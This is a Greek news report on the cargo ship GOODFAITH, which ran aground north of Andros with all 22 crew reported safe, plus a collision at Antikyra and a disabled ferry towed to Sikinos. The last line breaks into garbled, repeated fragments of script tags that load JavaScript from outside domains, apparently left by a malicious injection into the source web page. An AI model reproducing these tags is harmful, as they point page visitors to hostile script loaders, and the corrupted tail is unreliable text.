Καλά στην υγεία τους είναι οι 22 ναυτικοί του πλοίου που προσάραξε βόρεια της Άνδρου

Καλά στην υγεία τους είναι οι 22 ναυτικοί του πλοίου που προσάραξε βόρεια της Άνδρου

Καλά στην υγεία τους είναι τα 22 μέλη του πληρώματος (21 Φιλιππινέζοι και ένας Ρουμάνος) του φορτηγού πλοίου «GOODFAITH», που τα ξημερώματα παρουσίασε εισροή υδάτων ύστερα από προσάραξη βόρεια της Άνδρου, όπου πνέουν ισχυροί άνεμοι έντασης 9 με 10 μποφόρ.

Πάνω στο πλοίο, παραμένουν τέσσερις ναυτικοί, ενώ δύο ελικόπτερα «σούπερ πούμα» περισυνέλεξαν από το πλοίο 18 μέλη του πληρώματος που τα μετέφεραν στο αεροδρόμιο της Ελευσίνας και στο ελικοδρόμιο της Άνδρου.

Κοντά στο φορτηγό πλοίο έχει φθάσει ήδη ρυμουλκό από τον Πειραιά, ενώ αναμένονται άλλα δύο. Η κατάσταση του πλοίου προς το παρόν είναι δύσκολη να εκτιμηθεί λόγω των κακών καιρικών συνθηκών που επικρατούν στο σημείο.

Χθες, στη θαλάσσια περιοχή του όρμου της Αντίκυρας λόγω των δυσμενών καιρικών συνθηκών που επικρατούσαν στην περιοχή, φορτηγό πλοίο με σημαία Τουρκίας που βρίσκονταν στη διαδικασία μεθόρμισης από τις λιμενικές εγκαταστάσεις του «ΑΛΟΥΜΙΝΙΟΥ Α.Ε.» σε ασφαλές αγκυροβόλιο, λόγω μηχανικής βλάβης, προσέκρουσε στην πλώρη άλλου φορτηγού πλοίου που ήταν προσδεδεμένο στον ίδιο προβλήτα της λιμενικής εγκατάστασης. Από το περιστατικό δεν υπήρξε τραυματισμός ούτε θαλάσσια ρύπανση παρά μόνο μικρές υλικές ζημιές.

Στο μεταξύ στη Σίκινο μεταφέρεται με τη βοήθεια ρυμουλκού το επιβατηγό οχηματαγωγό πλοίο «Μελίνα ΙΙ» που με επταμελές πλήρωμα ήταν από χθες ακυβέρνητο λόγω μηχανικής βλάβης στη θαλάσσια περιοχή της νήσου Ρήνειας Μυκόνου.

Το πλοίο, κενό επιβατών, ήταν αγκυροβολημένο στη θαλάσσια περιοχή, αλλά λόγω των ισχυρών ανέμων έσπασαν οι κάβοι του, με αποτέλεσμα να χτυπήσει μία από τις προπέλες και να τεθεί εκτός λειτουργίας η μία μηχανή του.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >